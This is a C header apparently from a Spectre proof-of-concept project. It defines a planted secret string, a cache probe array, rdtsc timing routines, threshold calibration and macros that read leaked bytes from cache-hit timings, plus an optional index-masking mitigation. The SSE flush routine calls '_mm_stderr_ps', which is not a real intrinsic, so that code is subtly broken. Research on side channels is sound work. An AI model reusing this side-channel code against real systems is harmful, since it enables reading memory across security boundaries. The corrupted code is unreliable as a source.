octopus/octopus.h

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h>

#if defined(__i386__) || defined(__amd64__)
        #define CACHELINE_SIZE	64
#else
        #error "unsupported architecture"
#endif

#if defined(__SSE__) && !defined(__SSE2__)
	#define NORDTSCP
	#define NOMFENCE
	#define NOCLFLUSH
	#define LATENCY 18 + 18
#endif

#ifndef NORDTSCP
	#define LATENCY 42 + 42
#else
	#ifndef NOMFENCE
		#define LATENCY 18 + 18
	#endif
#endif

#ifdef MASKING_MITIGATION
	/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
	 *
	 * array_index_mask_nospec() - generate a mask that is ~0UL when the
	 * 	bounds check succeeds and 0 otherwise
	 * @index: array element index
	 * @size: number of elements in array
	 *
	 * Returns:
	 *     0 - (index < size)
	 */
	static inline unsigned long
	array_index_mask_nospec(unsigned long index, unsigned long size)
	{
		unsigned long mask;
		__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
			:"=r" (mask)
			:"g"(size),"r" (index)
			:"cc");
		return mask;
	}
#endif //MASKING_MITIGATION

#ifdef NOCLFLUSH
	#define CACHE_FLUSH_ITERATIONS 	2048
	#define CACHE_FLUSH_STRIDE 	4096

	uint8_t 	cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];

	/* Flush memory using long SSE instructions */
	void
	flush_memory_sse(uint8_t * addr)
	{
		float*	p = (float *)addr;
		float 	c = 0.f;
		__m128 i = _mm_setr_ps(c, c, c, c);

		int k, l;
		/* Non-sequential memory addressing by looping through k by l */
		for (k = 0; k < 4; k++)
			for (l = 0; l < 4; l++)
				_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
	}
#endif //NOCLFLUSH

#define GAP 512

char* 		secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
unsigned int 	cache_hit_threshold, array1_size = 16;
uint8_t 	unused1[64], unused2[64], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t 	channel[256 * GAP]; // side channel to extract secret phrase

#define __OCTOPUS_ARGS__\
	while ((o = getopt(argc, argv, "t:j")) != EOF) {\
		switch (o) {\
			case 't':\
				cache_hit_threshold = atoi(optarg);\
				break;\
			case 'j':\
				json++;\
				break;\
			default:\
			usage:\
				fprintf(stderr, "usage: %s [-j] "\
				"[-t threshold]\n"\
				"\t-j\t\tJSON output\n"\
				"\t-t INT\t\tfixed threshold\n", argv[0]);\
				return 1;\
		}\
	}\
	if (argc != optind) {\
		goto usage;\
	}

#define __OCTOPUS_TIMINGS__\
		/* Time reads. Order is lightly mixed up to prevent stride prediction */\
		for (i = 0; i < 256; i++) {\
			mix_i = ((i * 167) + 13) & 255;\
			addr = & channel[mix_i * GAP];\
			if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {\
				results[mix_i]++; /* cache hit - add +1 to score for this value */\
			}\
		}\
		/* Locate highest results in j */\
		j = -1;\
		for (i = 0; i < 256; i++) {\
			if (j < 0 || results[i] >= results[j]) {\
				j = i;\
			}\
		}\
		if (results[j] >= 3) {\
			break;\
		}

#define __OCTOPUS_NOCLFLUSH_INIT__\
		int junk2 = 0;\
		int l;\
		(void)junk2;

#define __OCTOPUS_MFENCE__\
	#ifndef NOMFENCE\
		_mm_mfence();\
	#endif

static inline unsigned
timed_access(volatile uint8_t *addr)
{
	uint64_t	t0, t1;
	#pragma GCC diagnostic ignored "-Wuninitialized"
	unsigned int junk = junk;
	#ifndef NORDTSCP
		t0 = __rdtscp(& junk);
		junk |= *addr;
		t1 = __rdtscp(& junk);
	#else
		#ifndef NOMFENCE
			/*
			Since the rdstc instruction isn't serialized, newer processors will try to
			reorder it, ruining its value as a timing mechanism.
			To get around this, we use the mfence instruction to introduce a memory
			barrier and force serialization. mfence is used because it is portable across
			Intel and AMD.
			*/
			_mm_mfence();
			t0 = __rdtsc();
			_mm_mfence();
			junk = *addr;
			_mm_mfence();
			t1 = __rdtsc();
			_mm_mfence();
		#else
			/*
			The mfence instruction was introduced with the SSE2 instruction set, so
			we have to ifdef it out on pre-SSE2 processors.
			Luckily, these older processors don't seem to reorder the rdtsc instruction,
			so not having mfence on older processors is less of an issue.
			*/
			t0 = __rdtsc();
			junk |= *addr;
			t1 = __rdtsc();
		#endif // NOMFENCE
	#endif // NORDTSCP
	return (unsigned)(t1 - t0 - LATENCY);
}

static void
calibrate_threshold(unsigned int *threshold)
{
	volatile char		buf[2 * CACHELINE_SIZE];
	volatile uint8_t*	bufp;
	int			i;
	const int 		cnt = 10000;
	uint64_t 		tcache = 0;
	__attribute__((unused))
	volatile int 		junk = 0;

	bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1)));

	junk |= *bufp;

	for (i = 0, tcache = 0; i < cnt; i++) {
		tcache += timed_access(bufp);
	}
	tcache = tcache / cnt;

	if (threshold != NULL) {
		*threshold = tcache + LATENCY;
	}
	return;
}